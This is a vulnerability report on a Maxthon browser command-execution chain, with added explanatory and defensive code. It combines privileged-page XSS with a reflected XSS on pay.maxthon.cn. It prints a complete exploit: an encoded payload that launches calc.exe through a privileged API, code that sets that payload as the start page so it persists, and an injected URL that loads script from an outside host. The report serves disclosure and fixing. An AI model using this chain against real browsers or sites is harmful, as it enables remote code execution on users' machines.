Maxthon (Aoyou) browser command execution vulnerability (privileged domain XSS)
The Maxthon browser has a design flaw: an XSS in a privileged domain that, combined with the privileged JavaScript APIs exposed there, gives command execution on the user's machine.
Detailed description:
Following the experts' lead and digging for bugs!
-------------------------------
0x00 privileged domain XSS
-------------------------------
Several privileged domains can be found in MxWebkit.dll.
Looking at the privileged page mx://res/error/danger_site.htm, it contains code that takes its URL query string and processes it as a URL.
Visiting mx://res/error/danger_site.htm?javascript:alert(document.domain) shows that the javascript: protocol is accepted, so the script runs with the privileged domain.
-------------------------------
0x01 vulnerability Exploitation
-------------------------------
Triggering the payload in the privileged domain needs a user click. Because newer browser versions restrict calling the mxCall function from external domains, the privileged page can only be loaded from a local (privileged) origin, so the clickjacking route is limited.
To raise the odds that a victim is hit, use an XSS on the maxthon.cn domain to set the privileged page carrying the XSS payload as the browser's start page.
From maxthon.cn, pages can call the maxthon objects to change browser configuration such as proxies, the home page and keyboard shortcuts.
The code for setting the homepage is as follows:
Test.js:
// The String.fromCharCode(...) payload in the URL below decodes to:
//   var s=document.createElement("iframe");s.src="mx://res/notification/";
//   s.onload=function(){s.contentWindow.maxthon.program.Program.launch("C:/windows/system32/calc.exe","")};
//   document.body.appendChild(s);
// i.e. it frames another privileged page and reaches its maxthon.program.Program.launch API through contentWindow.
url = "mx://res/error/danger_site.htm?javascript:eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))";
// Persist it as the start page so it runs on every browser launch.
maxthon.browser.config.ConfigManager.set("maxthon.config","browser.general.startpage",url);
All that remains is an XSS on maxthon.cn; scanning turns up the following one:
http://pay.maxthon.cn/bill99.php?gname=maxthon/">
Use the XSS to load external JS that runs the start-page code above. Annoyingly, this XSS is subject to a length limit on the reflected parameter. The way around it is an anonymous Function: Function(document.URL)() compiles the page's own URL as script, so the real payload can sit in the URL fragment, which the length limit does not cover. Evaluated as JavaScript, http://... is the label http: followed by a line comment //..., which would swallow everything after it; a literal U+2028 (a JavaScript line terminator that the browser leaves in place in the fragment) ends that comment, so the arbitrarily long code after it executes:
http://pay.maxthon.cn/bill99.php?gname=maxthon%22/%3E%3Csvg/onload=Function(document.URL)()%3E#【\u2028】var s=document.createElement("script");s.src="http://1.exploitcat.sinaapp.com/test.js";document.body.appendChild(s);
(【\u2028】 stands for one literal U+2028 character, not the six ASCII characters.)
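Added example, not part of the original report: a Node.js check of why Function(document.URL)() needs the U+2028 separator. The URL prefix is taken from the PoC above; the payload is a constructed stand-in that sets a global flag instead of loading test.js, and the separators compared are assumptions chosen to show the contrast.

```javascript
// Added example (not the report's code): why Function(document.URL)() only works
// once a U+2028 LINE SEPARATOR sits between the URL and the payload.
// Run with: node this_file.js   (Node.js >= 12 for globalThis)

// The injected handler is <svg/onload=Function(document.URL)()>, i.e. the whole
// page URL is compiled as JavaScript. Prefix copied from the PoC.
const INJECTED_URL =
  'http://pay.maxthon.cn/bill99.php?gname=maxthon%22/%3E%3Csvg/onload=Function(document.URL)()%3E#';

// Constructed payload: sets a global flag instead of appending a remote <script>.
const PAYLOAD = 'globalThis.__payload_hit = "payload ran";';

// Parsed as JavaScript, "http://host/..." is the label `http:` followed by a line
// comment `//host/...` that runs to the next LineTerminator. The JS lexer treats
// U+2028 as a LineTerminator, so the comment ends there and the payload becomes
// the label's statement. A space (or the six ASCII characters of an encoded
// newline) is not a terminator, so the whole URL stays inside the comment, the
// label has no statement, and compilation fails with a SyntaxError.
function runUrlAsScript(url) {
  delete globalThis.__payload_hit;
  try {
    Function(url)();                       // same call as in the svg onload handler
  } catch (e) {
    return 'not executed (' + e.name + ')';
  }
  return globalThis.__payload_hit || 'not executed';
}

// Compare candidate separators placed between the fragment marker '#' and the payload.
function compareSeparators() {
  return {
    lineSeparator:  runUrlAsScript(INJECTED_URL + '\u2028' + PAYLOAD),
    space:          runUrlAsScript(INJECTED_URL + ' ' + PAYLOAD),
    encodedNewline: runUrlAsScript(INJECTED_URL + '%0A' + PAYLOAD),
  };
}

console.log(compareSeparators());
```

A raw newline would end the comment too, but a browser percent-encodes it in document.URL, which is why the trick relied on U+2028 (the browser of that era passed it through in the fragment unencoded; browsers following the current URL standard percent-encode non-ASCII fragment characters, which blocks this variant).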
-------------------------------
0x02 Effect
-------------------------------
Restart the browser: the privileged page carrying the XSS is now the start page, and the command execution result is as follows:
Proof of vulnerability:
Solution:
1. Fix the XSS in maxthon.cn and the one in the privileged domain;
2. Apply finer-grained access control to the maxthon objects.
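Added example for solution item 1 and the finding in 0x00, not Maxthon's code: how a privileged error page should handle the URL it receives in its query string before navigating to it. The vulnerable behaviour is reconstructed from the report (everything after "?" is treated as a URL); the function names, the allow-list and the sample inputs are assumptions.

```javascript
// Added example (hypothetical names, not Maxthon's code): scheme allow-list for the
// URL that a privileged page like mx://res/error/danger_site.htm reads from its
// query string. Run with: node this_file.js

// Only plain web URLs may be navigated to from the privileged origin. Everything
// else (javascript:, data:, vbscript:, internal mx:// pages) is refused, so a
// script-bearing URL never executes with the privileged domain.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function isSafeNavigationTarget(raw) {
  let url;
  try {
    url = new URL(String(raw));   // parser lowercases the scheme and strips leading C0/space
  } catch (e) {
    return false;                 // unparseable: refuse rather than fall through to location.href
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// What the vulnerable page effectively did: treat everything after '?' as the URL.
function targetFromQuery_vulnerable(search) {
  return decodeURIComponent(search.replace(/^\?/, ''));
}

// Hardened form: same extraction, then the scheme allow-list; on rejection fall
// back to a harmless page instead of navigating to attacker-chosen text.
function targetFromQuery_hardened(search, fallback = 'about:blank') {
  let candidate;
  try {
    candidate = decodeURIComponent(search.replace(/^\?/, ''));
  } catch (e) {
    return fallback;              // malformed percent-encoding
  }
  return isSafeNavigationTarget(candidate) ? new URL(candidate).href : fallback;
}

// Constructed inputs: the report's PoC plus a few common evasions.
const SAMPLES = [
  '?javascript:alert(document.domain)',
  '?javascript%3Aalert(document.domain)',
  '? JaVaScRiPt:alert(1)',
  '?data:text/html,<script>alert(1)</script>',
  '?mx://res/notification/',
  '?http://example.com/danger',
];

for (const s of SAMPLES) {
  console.log(s, '=>', targetFromQuery_hardened(s));
}
```

This closes only the javascript: hole in the error page. Solution item 2 is the deeper fix: privileged APIs such as maxthon.program.Program.launch should not be reachable from another frame's contentWindow at all, which requires an origin check inside the browser rather than in page script.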